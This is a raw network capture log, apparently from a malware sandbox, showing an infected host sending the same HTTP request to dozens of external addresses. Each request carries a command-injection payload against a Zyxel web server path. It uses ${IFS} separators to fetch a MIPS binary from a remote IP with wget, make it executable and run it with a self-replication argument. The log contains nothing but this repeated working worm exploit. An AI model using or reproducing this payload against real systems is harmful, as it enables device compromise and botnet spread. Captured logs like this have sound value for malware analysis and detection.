                                      Jan 14, 2024 15:50:26.923989058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      509192.168.2.1444736159.135.27.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:27.927881002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      510192.168.2.143326886.129.198.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:27.927913904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      511192.168.2.1442138181.195.221.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:27.927949905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      512192.168.2.144918289.86.121.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:27.927999973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      513192.168.2.1453840145.210.70.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:27.928024054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      514192.168.2.1450712185.5.218.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:27.928056955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      515192.168.2.143314265.205.143.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:27.928090096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      516192.168.2.1438408132.239.85.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:27.928205967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      517192.168.2.1435060177.119.85.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:27.928240061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      518192.168.2.1448900182.72.119.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:28.932470083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      519192.168.2.143997453.9.112.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:28.932513952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      520192.168.2.1454960135.208.240.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:28.932554960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      521192.168.2.1438396223.68.147.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:28.932607889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      522192.168.2.1460470108.255.222.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:28.932686090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      523192.168.2.1446000192.242.240.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:29.937417030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      524192.168.2.14383669.220.106.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:29.937462091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      525192.168.2.145814889.186.67.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:29.937522888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      526192.168.2.145552264.4.33.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:29.937562943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      527192.168.2.144306879.244.93.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:29.937597036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      528192.168.2.143809434.106.247.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:30.941339970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      529192.168.2.1448900193.10.244.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:30.941389084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      530192.168.2.145261224.169.71.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:30.941417933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      531192.168.2.1437162134.125.48.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:30.941445112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      532192.168.2.1458596187.211.172.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:30.941468000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      533192.168.2.144067662.239.58.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:30.941514969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      534192.168.2.1455462101.3.60.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:30.941544056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      535192.168.2.1454264160.126.89.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:30.941591024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      536192.168.2.143295089.38.143.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:30.941623926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      537192.168.2.1455566222.74.17.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:30.941653013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      538192.168.2.1447996141.138.219.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:30.941706896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      539192.168.2.143458425.81.84.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:30.941762924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      540192.168.2.143498859.246.211.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:30.941819906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      541192.168.2.1435738190.63.132.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:30.941855907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      542192.168.2.1451550106.182.87.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:30.941895008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      543192.168.2.1452156134.129.192.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:30.941924095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      544192.168.2.1459930181.17.211.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:30.941950083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      545192.168.2.1458466173.156.197.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:30.941968918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      546192.168.2.144810682.248.31.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.951178074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      547192.168.2.144259898.187.46.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.951236963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      548192.168.2.143893040.40.197.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.951265097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      549192.168.2.143998667.30.45.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.951328993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      550192.168.2.1434138210.225.91.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.951354980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      551192.168.2.144924814.53.45.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.951399088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      552192.168.2.1456164208.186.146.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.951452971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      553192.168.2.1446424122.221.4.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.951483011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      554192.168.2.143618831.24.87.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.951530933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      555192.168.2.145220871.245.116.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.951570034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      556192.168.2.1450270176.215.196.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.951606989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      557192.168.2.1443314133.191.80.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.951631069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      558192.168.2.144149451.225.247.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.951713085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      559192.168.2.1442452157.56.51.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.951716900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      560192.168.2.145572489.143.62.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.951766968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      561192.168.2.1445300144.142.142.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.951806068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      562192.168.2.143552241.79.16.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.951838970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      563192.168.2.1439108144.52.221.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.951868057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      564192.168.2.1458436131.37.89.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.951919079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      565192.168.2.143503462.49.35.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.951936960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      566192.168.2.1458748135.253.82.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.951986074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      567192.168.2.145998214.146.110.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952044964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      568192.168.2.145834646.147.227.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952078104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      569192.168.2.1440408111.8.237.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952120066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      570192.168.2.143704657.113.255.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952161074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      571192.168.2.1439778116.33.132.149443
                                      TimestampBytes transferredDirectionData
